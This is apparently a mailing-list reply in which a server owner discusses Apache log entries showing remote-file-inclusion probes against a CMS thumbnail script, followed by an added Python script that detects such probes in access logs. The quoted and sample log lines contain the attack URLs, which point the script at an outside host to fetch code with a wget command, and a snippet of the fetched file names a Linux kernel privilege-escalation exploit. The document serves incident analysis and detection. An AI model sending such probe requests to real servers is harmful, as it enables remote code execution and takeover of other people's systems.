Re: ***DEB*: Re: help needed
Hi Fuzzums,
Fuzzums wrote:
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 499
"http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
http://213.202.214.106/CMD.gif isn't a gif.
[snip]
if ($kernel == "write") {
$kernel = "/*\n" .
" * hatorihanzo.c\n" .
" * Linux kernel do_brk vma overflow exploit.\n" .
[/snip]
but those attempts to access any /manager/ or /cms/ whatever URLs all got
a 403 forbidden and are non-existing on my box.
the kernel I'm running is sarge latest 2.6.8-16sarge5 which shouldn't be
vulnerable to that do_brk exploit.
thank you anyhow for digging into my logs
Bjoern
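
The check discussed in this message (did any of the remote-include requests get something other than a 403?) can be run over a whole access log. The following is an added example, not part of the original message: it assumes Apache "combined" format with one record per line, and the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter value that is itself a URL is the signature of a remote-include probe.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample records (documentation address ranges), modelled on the log above.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Nov/2006:17:26:03 +0100] "GET http://203.0.113.5/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://198.51.100.7/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.10 - - [03/Nov/2006:17:26:04 +0100] "GET /cms/index.php?page=http%3A%2F%2F198.51.100.7%2FCMD.gif%3F HTTP/1.0" 200 1024 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [03/Nov/2006:17:27:10 +0100] "GET /index.php?page=about HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return one finding per request that passes a remote URL as a query parameter value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format record (e.g. a wrapped or truncated line)
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so encoded "http%3A%2F%2F" is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                status = int(m.group("status"))
                findings.append({
                    "client": m.group("host"),
                    "path": parts.path,
                    "param": name,
                    "remote": value,
                    "status": status,
                    # 2xx means the script exists and answered: look at these first
                    "served": 200 <= status < 300,
                    # request line carried a full URL (GET http://host/...), as in the log above
                    "absolute_uri": bool(parts.scheme),
                })
                break  # one finding per request is enough
    return findings

if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG):
        print(f["status"], "SERVED" if f["served"] else "blocked", f["client"], f["path"], f["param"])
```

Records flagged with a 403 or 404 match what is described above (the paths do not exist on the box); any record flagged as served is the one worth following up.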